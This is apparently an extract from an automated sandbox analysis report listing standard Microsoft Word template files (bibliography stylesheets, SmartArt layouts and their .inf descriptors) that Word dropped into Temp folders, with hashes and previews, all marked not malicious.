                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7644.tmp\APASixthEditionOfficeOnline.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):333258
                                                                                                                                                Entropy (8bit):4.654450340871081
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                                                                                                                MD5:5632C4A81D2193986ACD29EADF1A2177
                                                                                                                                                SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                                                                                                                SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                                                                                                                SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7644.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):328
                                                                                                                                                Entropy (8bit):3.541819892045459
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                                                                                                                SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                                                                                                                SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                                                                                                                SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7645.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):302
                                                                                                                                                Entropy (8bit):3.537169234443227
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXfQIUA/e/Wl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyXZ/eulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:9C00979164E78E3B890E56BE2DF00666
                                                                                                                                                SHA1:1FA3C439D214C34168ADF0FBA5184477084A0E51
                                                                                                                                                SHA-256:21CCB63A82F1E6ACD6BAB6875ABBB37001721675455C746B17529EE793382C7B
                                                                                                                                                SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7645.tmp\iso690nmerical.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):217137
                                                                                                                                                Entropy (8bit):5.068335381017074
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                                                                                                                MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                                                                                                                SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                                                                                                                SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                                                                                                                SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7646.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):262
                                                                                                                                                Entropy (8bit):3.4901887319218092
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                                                                                                                MD5:52BD0762F3DC77334807DDFC60D5F304
                                                                                                                                                SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                                                                                                                SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                                                                                                                SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7646.tmp\RadialPictureList.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5596
                                                                                                                                                Entropy (8bit):7.875182123405584
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                                MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                                SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                                SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                                SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7656.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):286
                                                                                                                                                Entropy (8bit):3.538396048757031
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXcel8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyMelNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:149948E41627BE5DC454558E12AF2DA4
                                                                                                                                                SHA1:DB72388C037F0B638FCD007FAB46C916249720A8
                                                                                                                                                SHA-256:1B981DC422A042CDDEBE2543C57ED3D468288C20D280FF9A9E2BB4CC8F4776ED
                                                                                                                                                SHA-512:070B55B305DB48F7A8CD549A5AECF37DE9D6DCD780A5EC546B4BB2165AF4600FA2AF350DDDB48BECCAA3ED954AEE90F5C06C3183310B081F555389060FF4CB01
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .s.i.s.t.0.2...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7656.tmp\sist02.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):250983
                                                                                                                                                Entropy (8bit):5.057714239438731
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:JwprA6OS95vtfb8p4bgWPzkhUh9I5/oBRSifJeg/yQzvapSiQhHZeruvoXMUw3im:uP
                                                                                                                                                MD5:F883B260A8D67082EA895C14BF56DD56
                                                                                                                                                SHA1:7954565C1F243D46AD3B1E2F1BAF3281451FC14B
                                                                                                                                                SHA-256:EF4835DB41A485B56C2EF0FF7094BC2350460573A686182BC45FD6613480E353
                                                                                                                                                SHA-512:D95924A499F32D9B4D9A7D298502181F9E9048C21DBE0496FA3C3279B263D6F7D594B859111A99B1A53BD248EE69B867D7B1768C42E1E40934E0B990F0CE051E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7657.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):260
                                                                                                                                                Entropy (8bit):3.494357416502254
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX0XPE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyEXPGHmD0+dAH/luWvv
                                                                                                                                                MD5:6F8FE7B05855C203F6DEC5C31885DD08
                                                                                                                                                SHA1:9CC27D17B654C6205284DECA3278DA0DD0153AFF
                                                                                                                                                SHA-256:B7F58DF058C938CCF39054B31472DC76E18A3764B78B414088A261E440870175
                                                                                                                                                SHA-512:C518A243E51CB4A1E3C227F6A8A8D9532EE111D5A1C86EBBB23BD4328D92CD6A0587DF65B3B40A0BE2576D8755686D2A3A55E10444D5BB09FC4E0194DB70AFE6
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.h.e.m.e.P.i.c.t.u.r.e.G.r.i.d...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7657.tmp\ThemePictureGrid.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):6193
                                                                                                                                                Entropy (8bit):7.855499268199703
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                                                                                                                                MD5:031C246FFE0E2B623BBBD231E414E0D2
                                                                                                                                                SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                                                                                                                                SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                                                                                                                                SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7668.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):256
                                                                                                                                                Entropy (8bit):3.4842773155694724
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXDAlIJAFIloE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyMlI7loGHmD0+dAH/luWvv
                                                                                                                                                MD5:923D406B2170497AD4832F0AD3403168
                                                                                                                                                SHA1:A77DA08C9CB909206CDE42FE1543B9FE96DF24FB
                                                                                                                                                SHA-256:EBF9CF474B25DDFE0F6032BA910D5250CBA2F5EDF9CF7E4B3107EDB5C13B50BF
                                                                                                                                                SHA-512:A4CD8C74A3F916CA6B15862FCA83F17F2B1324973CCBCC8B6D9A8AEE63B83A3CD880DC6821EEADFD882D74C7EF58FA586781DED44E00E8B2ABDD367B47CE45B7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.o.n.v.e.r.g.i.n.g.T.e.x.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7668.tmp\ConvergingText.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):11380
                                                                                                                                                Entropy (8bit):7.891971054886943
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:VJcnLYnAVbOFLaCPLrGGbhaWEu6d3RmryqLkeAShObPb1AYcRMMXjkfa0nYBwggD:VcMC8lLrRbhy1ZqLyShYb1FHQ4C0nYQJ
                                                                                                                                                MD5:C9F9364C659E2F0C626AC0D0BB519062
                                                                                                                                                SHA1:C4036C576074819309D03BB74C188BF902D1AE00
                                                                                                                                                SHA-256:6FC428CA0DCFC27D351736EF16C94D1AB08DDA50CB047A054F37EC028DD08AA2
                                                                                                                                                SHA-512:173A5E68E55163B081C5A8DA24AE46428E3FB326EBE17AE9588C7F7D7E5E5810BFCF08C23C3913D6BEC7369E06725F50387612F697AC6A444875C01A2C94D0FF
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........q.~<.6..9 ...e......diagrams/layout1.xml..r.........{.]..u...xv7b.....HPd....t.q...b.i_a.'..P.f.3..F..1...U.u.*.2......?}..O..V.....yQ.Mf........w.....O....N.........t3;...e....j.^.o&.....w...../.w................e.................O..,./..6...8>^.^..........ru5...\.=>[M?......g..........w.N....i.........iy6.?........>.......>{yT...........x.........-...z5.L./.g......_.l.1.....#...|...pr.q

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7669.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):238
                                                                                                                                                Entropy (8bit):3.472155835869843
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXGE2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny4GHmD0+dAH/luWvv
                                                                                                                                                MD5:2240CF2315F2EB448CEA6E9CE21B5AC5
                                                                                                                                                SHA1:46332668E2169E86760CBD975FF6FA9DB5274F43
                                                                                                                                                SHA-256:0F7D0BD5A8CED523CFF4F99D7854C0EE007F5793FA9E1BA1CD933B0894BFBD0D
                                                                                                                                                SHA-512:10BA73FF861112590BF135F4B337346F9D4ACEB10798E15DC5976671E345BC29AC8527C6052FEC86AA7058E06D1E49052E49D7BCF24A01DB259B5902DB091182
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .r.i.n.g.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7669.tmp\rings.glox

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5151
                                                                                                                                                Entropy (8bit):7.859615916913808
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                                                                                                                                MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                                                                                                                                SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                                                                                                                                SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                                                                                                                                SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7689.tmp\Content.inf

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278
                                                                                                                                                Entropy (8bit):3.5280239200222887
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:877A8A960B2140E3A0A2752550959DB9
                                                                                                                                                SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                                                                                                                SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                                                                                                                SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                C:\Users\user\AppData\Local\Temp\TCD7689.tmp\gb.xsl

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):268317
                                                                                                                                                Entropy (8bit):5.05419861997223
                                                                                                                                                Encrypted:false
